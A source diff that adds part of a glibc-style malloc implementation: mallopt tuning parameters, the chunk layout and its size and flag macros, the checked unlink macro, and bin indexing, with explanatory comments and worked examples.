+*/
+int      __posix_memalign(void **, size_t, size_t);
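+
+/*
+  A caller-side sketch; failure is reported through the return value,
+  not through errno:
+
+    void *buf;
+    int err = posix_memalign (&buf, 64, 1024);  // 1 KiB, 64-byte aligned
+    if (err != 0)
+      fprintf (stderr, "posix_memalign: %s\n", strerror (err));
+*/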
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to eight 4-byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
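+
+/*
+  Tuning sketch: raise the trim threshold so that bursts of frees do not
+  trigger sbrk trimming (the 1 MiB value is illustrative):
+
+    mallopt (M_TRIM_THRESHOLD, 1024 * 1024);
+*/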
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
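+
+/*
+  Tuning sketch: on systems where sbrk is slow, pad each extension so
+  that start-up allocations call sbrk less often (value illustrative):
+
+    mallopt (M_TOP_PAD, 128 * 1024);
+*/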
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb threshold imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86; at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
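+
+/*
+  Tuning sketch: pin the mmap threshold at 256 KiB (illustrative).  Note
+  that setting it explicitly turns off the dynamic (sliding) threshold
+  described above:
+
+    mallopt (M_MMAP_THRESHOLD, 256 * 1024);
+*/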
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
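+
+/*
+  Tuning sketch: setting M_MMAP_MAX to 0 forces every request, however
+  large, through the sbrk/arena path instead of mmap:
+
+    mallopt (M_MMAP_MAX, 0);
+*/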
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if allocated            | |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                       |M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk                                     |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk                            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                         |P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The two exceptions to all this are
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size field.
+
+*/
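+
+/*
+  A sketch for anyone reading or extending this code: given a user
+  pointer returned by malloc, the chunk header can be inspected with the
+  macros defined below:
+
+    mchunkptr p  = mem2chunk (mem);   // step back over the two size fields
+    size_t    sz = chunksize (p);     // size with the flag bits masked off
+    int       pi = prev_inuse (p);    // PREV_INUSE bit of this chunk
+*/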
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
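+
+/*
+  Worked example, assuming a 64-bit build where SIZE_SZ == 8,
+  MALLOC_ALIGN_MASK == 15 and MINSIZE == 32:
+
+    request2size (24) == (24 + 8 + 15) & ~15 == 32   (a 0x20 chunk)
+    request2size (25) == (25 + 8 + 15) & ~15 == 48   (a 0x30 chunk)
+
+  A 24-byte request fits in the minimum chunk because the user data may
+  overlap the next chunk's prev_size field while this chunk is in use.
+*/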
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* check for chunk from non-main arena */
+#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p)         ((p)->size & ~(SIZE_BITS))
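+
+/*
+  Worked example: a size field holding 0x115 encodes chunksize(p) == 0x110
+  with PREV_INUSE and NON_MAIN_ARENA set and IS_MMAPPED clear.
+*/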
+
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))
+
+/* Ptr to previous physical malloc_chunk */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - ((p)->prev_size)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->size = (((p)->size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->prev_size = (s))
+
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (P->size)				      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr (check_action,				      \
+			       "corrupted double-linked list (not small)",    \
+			       P, AV);					      \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
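+
+/*
+  Worked examples, assuming a 64-bit build where SIZE_SZ == 8,
+  SMALLBIN_WIDTH == 16, SMALLBIN_CORRECTION == 0 and MIN_LARGE_SIZE == 1024:
+
+    bin_index (0x90)  == smallbin_index (0x90)  == 0x90 >> 4         ==  9
+    bin_index (0x500) == largebin_index (0x500) == 48 + (0x500 >> 6) == 68
+*/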
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
